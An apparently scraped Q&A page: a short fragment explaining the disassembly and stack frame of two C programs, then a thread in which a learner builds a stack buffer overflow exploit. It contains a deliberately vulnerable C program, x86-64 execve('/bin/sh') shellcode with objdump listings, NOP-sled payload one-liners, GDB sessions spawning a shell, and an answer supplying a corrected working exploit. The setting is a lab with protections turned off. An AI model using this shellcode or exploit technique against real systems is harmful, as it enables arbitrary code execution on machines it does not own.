< 4004f8: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
---
> 4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
Note on address 0x4004f8 your number is there, 4e 61 bc 00 on prog2 and 00 00 00 00 on prog1, both 4 bytes which is equal to sizeof(int). The bytes c7 45 fc are the rest of the instructions (move some value into an offset of rbp). Also note that the first two sections that differ have the same size in bytes (21). So, there you go, although slightly different, they're the same size.
Step by step through Assembly Instructions
push %rbp; mov %rsp, %rbp: This is called setting up the Stack Frame, and is standard for all C functions (unless you tell gcc -fomit-frame-pointer). This enables you to access the stack and your local variables through a fixed register, in this case, rbp.
mov %edi, -0x14(%rbp): This moves the content of register edi into our local variables frame. Specifically, into offset -0x14
mov %rsi, -0x20(%rbp): Same here. But this time it saves rsi. This is part of the x86_64 calling convention (which now uses registers instead of pushing everything on stack like x86_32), but instead of keeping them in registers, we free the registers by saving the contents in our local variables frame - register are way faster and are the only way the CPU can actually process anything, so the more free registers we have, the better.
Note: edi is the 4-bytes part of the rsi register and from the x86_64 calling convention, we know that rsi register is used for the first argument. main's first argument is int argc, so it makes sense we use a 4-byte register to store it. rsi is the second argument, effectively the address of a pointer to pointer to chars (**argv). So, in 64bit architectures, that fits perfectly into a 64bit register.
<+11>: movl $0xbc614e,-0x4(%rbp): This is the actual line int i = 12345678 (0xbc614e = 12345678d). Now, note that the way we "move" that value is very similar to how we stored the main arguments. We use offset -0x4(%rbp) to store it memory, on the "local variables frame" (this answers your question on where it gets stored).
mov $0x0, %eax; pop %rbp; retq: Again, dull stuff to clear up the frame pointer and return (end the program since we're in main).
Note that on the second example, the only difference is the line <+11>: movl $0x0,-0x4(%rbp), which effectively stores the value zero - in C words, int i = 0.
So, by these instructions you can see that the main function of both programs gets translated to assembly in the exact the same way, so their sizes are the same in the end. (Assuming you compiled them the same way, because the compiler also puts lots of other things in the binaries, like data, library functions, etc. In linux, you can get a full disassembly dump using objdump -D program.
Note 2: In these examples, you cannot see how the computer subtracts values from rsp in order to allocate stack space, but that's how it's normally done.
Stack Representation
The stack would be like this for both cases (only the value of i would change, or the value at -0x4(%rbp))
| ~~~ | Higher Memory addresses
| |
+------------------+ <--- Address 0x8(%rbp)
| RETURN ADDRESS |
+------------------+ <--- Address 0x0(%rbp) // instruction push %rbp
| previous rbp |
+------------------+ <--- Address -0x4(%rbp)
| i=0x11223344 |
+------------------+ <---- Address -0x14(%rbp)
| argc |
+------------------+ <---- address -0x20(%rbp)
| argv |
+------------------+
| |
+~~~~~~~~~~~~~~~~~~+ Lower memory addresses
Note 3: The direction to where the stack grows depends on your architecture. How data gets written in memory also depends on your architecture.
Resources
What are the calling conventions for UNIX & Linux system calls on x86-64
Call Stack
GCC Optimization Options
Understanding the Stack
How does the stack work in assembly language?
x86_64 : is stack frame pointer almost useless?

Syscall inside shellcode won't run

Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes alright until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.
The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64 bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.
Therefore, you shellcode run alright as a standalone program is not a proof that it works.
The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why the exploit works inside GDB but does not outside it?

The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
The above code (with the return address adjusted for my system) works fine here.